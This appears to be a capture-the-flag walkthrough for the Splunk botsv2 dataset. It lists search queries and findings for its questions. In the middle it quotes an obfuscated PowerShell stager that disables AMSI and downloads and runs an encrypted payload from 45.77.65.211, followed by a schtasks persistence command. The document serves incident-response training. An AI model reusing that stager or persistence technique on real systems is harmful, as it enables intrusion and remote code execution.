Page cover

v2

100 series questions

Count all events

| metadata type=sourcetypes index=botsv2

| eval firstTime=strftime(firstTime,"%Y-%m-%d %H:%M:%S")

| eval lastTime=strftime(lastTime,"%Y-%m-%d %H:%M:%S")

| eval recentTime=strftime(recentTime,"%Y-%m-%d %H:%M:%S")

| sort - totalCount

  • index="botsv2" amber

  • index="botsv2" sourcetype="pan:traffic"

  • index="botsv2" Amber src_user="frothly.local\amber.turing" | reverse

  • index="botsv2" 10.0.2.101 *beer* sourcetype="stream:HTTP" | dedup site | table _time site

  • index="botsv2" 10.0.2.101 sourcetype="stream:HTTP" www.berkbeer.com | table _time uri_path

  • index="botsv2" *berk* "method{}"=MAIL

    • index="botsv2" mberk@berkbeer.com

    • index="botsv2" aturing@froth.ly

    • index="botsv2" | search "Heinz Bernhard Contact Information"

      • ambersthebest@yeastiebeastie.com

        • Amber Turing

      • mberk@berkbeer.com

        • Martin Berk

      • aturing@froth.ly

        • Amber Turing

      • hbernhard@berkbeer.com

        • Heinz Bernhard

index="botsv2" | search "@berkbeer.com"

hint

200 series questions

  • index="botsv2" Amber TOR

  • index="botsv2" brewertalk.com

  • index="botsv2" brewertalk.com http_comment="HTTP/1.1 404 Not Found" | table _time src_ip src_header uri_path http_method | stats count by src_ip

    • 45.77.65.211

  • index="botsv2" 52.42.208.228 | stats count by uri_path

  • index="botsv2" 52.42.208.228 | dedup form_data | table form_data

    • kIagerfield

  • index="botsv2" member.php SQL | stats count by form_data

  • index="botsv2" kevin | dedup cookie | table cookie src_ip dest_ip

  • index="botsv2" Mallory .pptx | dedup filename | table _time filename

  • index="botsv2" host="MACLORY-AIR13" .pptx

    • /Volumes//FROTHLY/Home/mallory.kraeusen/Frothly_marketing_campaign_Q317.pptx

    • /Users/mallorykraeusen/Documents/

index="botsv2" mallory MACLORY-AIR13

  • index="botsv2" Mallory .crypt | dedup filename | table _time filename

  • index="botsv2" .mkv

  • index="botsv2" host="MACLORY-AIR13" ".crypt" sourcetype=ps

  • index="botsv2" kutekitten | search vendor action=added

    • columns.vendor_id

    • Google that ID

  • index="botsv2" kutekitten.local mkraeusen | dedup columns.md5 | table columns.name columns.path columns.value name columns.cmdline columns.md5

  • index="botsv2" befa9bfe488244c64db096522b4fad73fc01ea8c4cd0323f1cbdee81ba008271

    • /Users/mkraeusen/Downloads/Important_HR_INFO_for_mkraeusen

  • Last 2 are here:

  • index=botsv2 *.zip

    • C:\Users\billy.tun\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\4RND1WK1\invoice.zip

    • 2017-08-24 03:27:29.947

  • index=botsv2 invoice.zip

    • check email content

  • index=botsv2 SSL app=ssl

    • ssl_issuer

  • index=botsv2 Frothly winsys32.dll

[Ref].AsSEmbLY.GetTYPE('System.Management.Automation.AmsiUtils')|? {
    $_
}

|% {
    $_.GeTFIeLd('amsiInitFailed', 'NonPublic,Static').SEtVaLUE($nULl, $TRuE)
};
[SYstem.NEt.SERvICEPOInTMAnagER]::EXPEct100ContiNue = 0;
$wC = NEW - ObjECt SYsTeM.NeT.WEbCliEnt;
$u = 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {
    $true
};
$wc.HeAdeRS.AdD('User-Agent', $u);
$WC.Proxy = [SySTEm.Net.WeBREQUeSt]::DEfAulTWeBProxY;
$Wc.PROxy.CReDeNtIalS = [SystEm.NEt.CrEdEntiaLCacHe]::DeFAuLtNetWORkCREDeNtIAls;
$K = [SystEm.Text.EncODIng]::ASCII.GeTByTeS('389288edd78e8ea2f54946d3209b16b8');
$R = {
    $D, $K = $ARgs;
    $S = 0..255;
    0..255|% {
        $J = ($J + $S[$_] + $K[$_%$K.CouNt])%256;
        $S[$_], $S[$J] = $S[$J], $S[$_]
    };
    $D|% {
        $I = ($I + 1)%256;
        $H = ($H + $S[$I])%256;
        $S[$I], $S[$H] = $S[$H], $S[$I];
        $_ - BxOR$S[($S[$I] + $S[$H])%256]
    }

};
$wc.HeadERs.ADd("Cookie", "session=lrtRHKkA6IL5h/d8Ekk6QsxyPvk=");
$ser = 'https://45.77.65.211:443';
$t = '/admin/get.php';
$DATA = $WC.DoWNLoaDDATA($SER + $T);
$iV = $DAta[0..3];
$DatA = $dATa[4..$DaTa.lENGTh];
 - JoIN[CHar[]](& $R $daTa ($IV + $K))|IEX
  • index="botsv2" winsys32.dll

    • Shows what program is used

  • index="botsv2" sourcetype="stream:ftp"

    • Shows used program activity

  • index="botsv2" sourcetype="stream:ftp" method=RETR | dedup filename | table filename

    • Will expose the filename

index="botsv2" schtasks.exe

C:\Windows\system32\schtasks.exe" /Create /F /RU system /SC DAILY /ST

HKLM:\Software\Microsoft\Network debug

Last updated